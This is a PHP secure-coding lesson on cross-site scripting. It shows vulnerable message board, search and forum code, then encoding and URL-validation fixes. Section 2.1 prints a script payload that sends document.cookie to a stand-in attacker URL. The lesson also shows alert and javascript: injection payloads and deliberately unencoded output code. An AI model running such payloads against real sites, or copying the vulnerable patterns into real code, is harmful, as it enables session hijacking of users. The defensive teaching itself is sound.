Code Security
 
Security Coding using PHP -- Write Safe Code
6. Prevention of Cross-Site Scripting (XSS) Attack
Questions
Question 1: What is Cross-Site Scripting Attack?
Question 2: What damages may be caused by Cross-Site Scripting Attack?
Question 3: How to prevent Cross-Site Scripting Attack?
Units
1. What is Cross-Site Scripting Attack
2. Some examples of Cross-Site Scripting Attack
3. Prevention of Cross-Site Scripting Attack
1. What is Cross-Site Scripting Attack
Cross-Site Scripting Attack, usually written XSS, is an attack in which a malicious script or HTML fragment is written into the content of a web page. The malicious data is then assembled into the page and rendered by the browser on the user's computer, so the attack is launched against the user and can result in leakage of the user's data.
The most typical case is that attackers use a Cross-Site Scripting vulnerability to steal the user's cookies, obtain the user's identity and rights on the site, and thus impersonate the user to perform operations on the site.
A cookie is a small piece of data that the server stores on a user's computer via the browser.
Normally in PHP, we use a session to determine the identity of the user.
When the browser visits the website for the first time, PHP sends a cookie to the browser to mark the user's identity. Different browsers receive different cookies, and each time the browser visits the website it sends its cookie back to PHP. In this way, PHP can determine which session the user corresponds to by looking at the cookie.
A cookie corresponds to a session in PHP. Therefore, as long as the attacker obtains the cookie of the attacked user and sends it to PHP, the attacker effectively obtains the user's session: PHP treats the attacker as the hijacked user, and the attacker can visit the website under the user's identity and perform all kinds of illegitimate operations that only that user should be able to perform.
2. Some examples of Cross-Site Scripting Attack
2.1. An example of a message board
Submit to a message board:
<form action="save.php" method="post">
Username: <input type="text" name="username" />
Message: <textarea name="comment"></textarea>
<input type="submit" value="Save" />
</form>
 
Display message board:
<?php
// get name and message from database (omitted)
// show name and message: the values are echoed without any encoding
echo "Username: " . $username . ", message is: " . $comment;
?>
 
If the attacker leaves the following message:
 
<script>
window.location = "http://www.example.com/hack.php?cookies=" + document.cookie;
</script>
 
When the message board is displayed, this script is output directly into the page. When a user views the message board, the script runs automatically in the user's browser, so the user's cookie is sent to the attacker's website, and the attacker can use that cookie to perform other actions as the user.
2.2. An example of a search
<form action="search.php" method="get">
Keywords: <input type="text" name="keywords" />
<input type="submit" value="Search" />
</form>
 
Show search result:
<?php
// the keyword is echoed straight from the query string without any encoding
echo "Searching keywords " . $_GET["keywords"] . " found the following results:";
// show search result, omitted
?>
 
If an attacker sends other users a link like this:
search.php?keywords=<script>alert();</script>
 
Then when the user opens this link, the page shows:
Searching keywords <script>alert();</script> found the following results:
 
The attack script is successfully inserted into the page, and the attacker can replace the alert with other malicious scripts to achieve the purpose of the attack.
2.3. An example of a forum
Many forums support the insertion of images when posting, for example:
 
[img]http://www.example.org/logo.gif[/img]
 
When forum posts are displayed, the [img] tag is replaced with real HTML code; for example, the tag above is replaced with:
<img src="http://www.example.org/logo.gif">
 
When an attacker enters a tag like this:
[img]javascript:alert();[/img]
 
It is replaced with HTML code like this when displayed:
<img src="javascript:alert();">
 
This also successfully inserts the attack script, and the attacker can replace the alert with other malicious scripts to achieve the purpose of the attack.
3. Prevention of Cross-Site Scripting Attack
1. All input data should be filtered to neutralize special characters. For example, when saving to the database, use htmlentities to encode the special HTML characters.
 
2. All output data should also be filtered: replace < with &lt; and > with &gt;. This does not change what the user sees, but it prevents the script from being executed.
 
For 2.1, using this method, the message board displays:
&lt;script&gt;
window.location = "http://www.example.com/hack.php?cookies=" + document.cookie;
&lt;/script&gt;
 
For 2.2, using the same method, the result is shown as follows:
Searching keywords &lt;script&gt;alert();&lt;/script&gt; found the following results:
 
In these cases, the script will not be executed, preventing attacks.
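The following is an added example, not code from the course, that applies rule 2 to the two vulnerable displays in 2.1 and 2.2. It uses PHP's htmlspecialchars, which encodes <, >, &, " and ' (with ENT_QUOTES), which is all that output escaping for HTML text and attribute content needs; the function name e(), the render functions and the sample inputs are constructed here. The sample inputs reproduce the payloads shown in 2.1 and 2.2 so you can see them come out as inert text.

```php
<?php
// Added example: encode untrusted values at output time.
// e(), renderMessage(), renderSearchHeading() and the sample data are
// constructed for this example; they are not part of the course code.

declare(strict_types=1);

/**
 * Encode a string for safe insertion into HTML text or a quoted attribute.
 * ENT_QUOTES encodes both " and ', ENT_SUBSTITUTE replaces invalid UTF-8
 * sequences instead of returning an empty string, and the charset is explicit
 * so the result does not depend on the default_charset ini setting.
 */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Hardened version of the message board display from 2.1. */
function renderMessage(string $username, string $comment): string
{
    return "Username: " . e($username) . ", message is: " . e($comment);
}

/** Hardened version of the search heading from 2.2. */
function renderSearchHeading(string $keywords): string
{
    return "Searching keywords " . e($keywords) . " found the following results:";
}

// Constructed sample data: the payloads shown in 2.1 and 2.2.
$username = 'alice';
$comment  = "<script>\n"
          . "window.location = \"http://www.example.com/hack.php?cookies=\" + document.cookie;\n"
          . "</script>";
$keywords = '<script>alert();</script>';

// Vulnerable display from 2.1 (raw concatenation) beside the hardened one.
$vulnerable = "Username: " . $username . ", message is: " . $comment;
$safe       = renderMessage($username, $comment);

echo "Vulnerable output:\n", $vulnerable, "\n\n";
echo "Encoded output:\n", $safe, "\n\n";
echo renderSearchHeading($keywords), "\n";
```

Run it with `php` on the command line: the encoded output contains `&lt;script&gt;` and `&quot;` rather than `<script>` and `"`, so the browser renders the text of the payload and executes nothing. Encoding with ENT_QUOTES matters whenever the value lands inside an attribute such as `value="..."` in the search form, where an unencoded `"` would let the input close the attribute.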
 
3. All user input should be carefully analyzed and, combined with the actual situation, restrictions should be defined; when checking the user's input, it must satisfy those restrictions.
 
For 2.3, only pictures are to be displayed, so you should check that the data between [img] and [/img] starts with http://, and also replace " with &quot; so that the attack cannot succeed.
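The following is an added example, not code from the course, that implements rule 3 for the [img] tag of 2.3. It goes slightly beyond the text: instead of only testing for the prefix http://, it parses the value with parse_url and accepts only http or https URLs with a host, and it escapes the whole post first so that nothing the poster typed is emitted as raw HTML. The function names safeImageUrl() and renderPost() and the sample posts are constructed here.

```php
<?php
// Added example: convert [img]...[/img] to <img> only when the enclosed value
// is an absolute http:// or https:// URL, and encode it for the src attribute.
// safeImageUrl(), renderPost() and the sample posts are constructed for this
// example; they are not part of the course code.

declare(strict_types=1);

/**
 * Return the URL if it is acceptable for an <img src>, otherwise null.
 * Rejects empty values, whitespace and control characters, anything that does
 * not parse as a URL, and any scheme other than http or https. This refuses
 * javascript:, data: and relative values, which is stricter than a plain
 * "starts with http://" check.
 */
function safeImageUrl(string $candidate): ?string
{
    $candidate = trim($candidate);
    if ($candidate === '' || preg_match('/[\s\x00-\x1f\x7f]/', $candidate)) {
        return null;
    }
    $parts = parse_url($candidate);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $candidate;
}

/**
 * Replace [img]...[/img] in a post with <img src="..."> for valid URLs.
 * The post is escaped as a whole first, so no markup written by the poster
 * survives; only the [img] tags we recognise are rebuilt afterwards.
 */
function renderPost(string $post): string
{
    $escaped = htmlspecialchars($post, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return preg_replace_callback(
        '#\[img\](.*?)\[/img\]#is',
        static function (array $m): string {
            // The callback sees entity-encoded text; decode it before validating.
            $raw = html_entity_decode($m[1], ENT_QUOTES, 'UTF-8');
            $url = safeImageUrl($raw);
            if ($url === null) {
                // Leave the tag visible as plain text instead of emitting an <img>.
                return $m[0];
            }
            // Re-encode for the attribute context; ENT_QUOTES turns " into &quot;.
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $escaped
    );
}

// Constructed sample posts: a legitimate image, the javascript: case from 2.3,
// and a value that tries to close the src attribute with a quote.
$posts = [
    '[img]http://www.example.org/logo.gif[/img]',
    '[img]javascript:alert();[/img]',
    '[img]http://www.example.org/a.gif" onerror="alert()[/img]',
];
foreach ($posts as $post) {
    echo renderPost($post), "\n";
}
```

Only the first post becomes an `<img>` tag. The second fails the scheme check, and the third is rejected because it contains whitespace; even if it had passed, the `"` would be emitted as `&quot;` and could not terminate the attribute. Escaping the whole post before rebuilding the allowed tags is what makes the check robust: a missed tag results in visible text, not executable markup.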
 
© 2024 Beijing Three Programmers Information Technology Co. Ltd